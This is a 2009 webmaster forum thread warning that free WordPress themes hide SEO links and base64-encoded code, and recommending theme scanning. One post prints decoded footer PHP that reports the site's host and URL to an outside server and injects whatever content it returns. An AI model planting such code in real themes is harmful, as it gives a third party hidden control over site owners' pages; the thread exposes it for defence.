|
2009-05-03, 03:44 PM | #1 |
Oh no, I'm sweating like Roger Ebert
|
Warning Using Free WP Themes
Just wanted to give people a heads up, the last two themes I downloaded have had hidden links inside the code for the index file.
They wouldn't show up on the page but were viewable when you looked at the source. |
2009-05-03, 03:55 PM | #2 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
I suspected the same on a client's site that runs multiple wordpress installations that has used multiple free templates. In 5 of the cases, the templates included code in the header.php and sidebar.php that allowed specially crafted strings to allow remote execution. We weren't able to determine whether the modification was made prior to his template being installed or the result of someone having his admin password for a few of the blogs as he didn't have the original template file zips.
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
2009-05-03, 04:46 PM | #3 |
Oh no, I'm sweating like Roger Ebert
|
None of the stuff I've found, so far, has been malicious but I do suggest anyone using free themes look at them closely.
I've never noticed it before but one of the themes I had issues with was one I'd downloaded about a year ago. I just had never used it. |
2009-05-03, 07:53 PM | #4 |
I can now put whatever you want in this space :)
Join Date: Mar 2009
Location: Merica!
Posts: 543
|
What were the hidden links to? And were they base64 encoded? I've seen a coiuple of those, and could have just decoded and removed the base64 encoded crap, but I ditched the themes instead.
|
2009-05-03, 09:39 PM | #5 | |
Oh no, I'm sweating like Roger Ebert
|
Quote:
These were links written as html but positioned in such a way that they were not visible. One of them redirected to what looks like an old tube site. The others I didn't follow but deleted. |
|
2009-05-03, 10:30 PM | #6 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
Encoding makes it hard for someone to change the link and remove the link that they are trying to send a little PR to. It is usually wrapped around some other function so that removing it breaks the template somewhat. That's their 'payment' for making the free template.
However, it does make it incredibly easy to hide a malicious payload -- a payload that probably 90% of the internet wouldn't ever notice. If you had something unique enough in the template that you could find sites using it through a google search, you could exploit a few machines. It is the reason I suspect that the templates were not delivered with exploits, but, modified through the wordpress admin.
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
2009-05-05, 12:46 PM | #7 |
Hey, can you take the wheel for a second, I have to scratch my self in two places at once
Join Date: Aug 2003
Posts: 186
|
Also, check the footers of any free template. Quite a few have hidden links or Base 64 code. I simply do not use them or eliminate the code.
|
2009-05-05, 01:19 PM | #8 |
You tried your best and you failed miserably. The lesson is 'never try'
Join Date: Dec 2008
Posts: 169
|
I checked mine and luckily didn't have any crap in there. But yeah defiantly want to check and make sure there isn't something that might change your blog without your knowing it.
|
2009-05-07, 12:04 AM | #9 | |
I can now put whatever you want in this space :)
Join Date: Mar 2009
Location: Merica!
Posts: 543
|
Quote:
__________________
Its just a jump to the left. |
|
2009-05-07, 01:05 AM | #11 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
The problem is that when you decode it like that, you see the rendered code. So, if there was a widget called in the footer, you would have the rendered widget and you couldn't use the wordpress admin to control it.
Secondly, if you do view the rendered text and think, ok, I'm good with what is being displayed, you would miss any possible exploits that require certain parameters or header values and you wouldn't be able to see the actual code being executed. I wouldn't use that as a safety net, though, if it didn't include your existing footer widgets, then I would think you should be ok. What I'm starting to see somewhat frequently is that they are wrapping integral page functions into their encoding to prevent you from blindly removing the encoded block.
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
2009-05-27, 04:42 PM | #12 |
Me fail English? That's unpossible!
|
I just downloaded a free WP theme and I like to check the code as well, so I decoded the footer.php and found
Code:
error_reporting(0); $CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]); if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) { echo @file_get_contents($CodeURL); } elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) { $content = @file($CodeURL); echo @join("", $content); } elseif (function_exists("curl_init")) { $ch = curl_init($CodeURL); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } |
2009-05-27, 05:03 PM | #13 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
They are grabbing a link from their rotator script based on the domain that is requesting it. They would be able to change the links displayed in the footer based on your domain name.
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
2009-06-13, 08:01 PM | #15 |
Someone Turn Off The Damn Heat!
|
download the TAC plugin dont have like but google it works great to scan your themes
__________________
Get ElevatedX W/Hosting 99MO! |
2009-06-16, 02:07 AM | #16 |
Internet! Is that thing still around?
Join Date: Jun 2009
Posts: 2
|
Is it possible to have the names of those WP themes, Thanks for bringing this up.
|
2009-06-16, 11:13 AM | #17 |
Are you sure this is the Sci-Fi Convention? It's full of nerds!
Join Date: Mar 2009
Posts: 266
|
mmm, thanks for letting us know!
|
2009-06-16, 01:48 PM | #18 |
Oh no, I'm sweating like Roger Ebert
|
Seriously, there are too many to list. Most of the ones created within the last year seem to have encoded footers at least.
|
2009-06-16, 06:13 PM | #19 | |
Someone Turn Off The Damn Heat!
|
Quote:
as was previously posted, too many too list and who know what you are using, some of them, it's not malicious, it's just them maybe taking some probably crap traffic that didn't already buy from you posts in the bottom footer, so those, if the theme is good seo wise and looks good, go ahead and use it, i mean it's free and they person who made it might as well make a bit of cash for their hard work, but others do has evil code in them, download the TAC plugin that i listed earlier and test the theme.
__________________
Get ElevatedX W/Hosting 99MO! |
|
2009-06-17, 05:26 AM | #20 |
Internet! Is that thing still around?
Join Date: Jun 2009
Posts: 3
|
thanks, before reading this all I've just thought editing index file and deleting links will help, but everything seems to be a lot more complicated. Thanks again.
__________________
Create your own dating site with 6 million profiles for free! |
|
|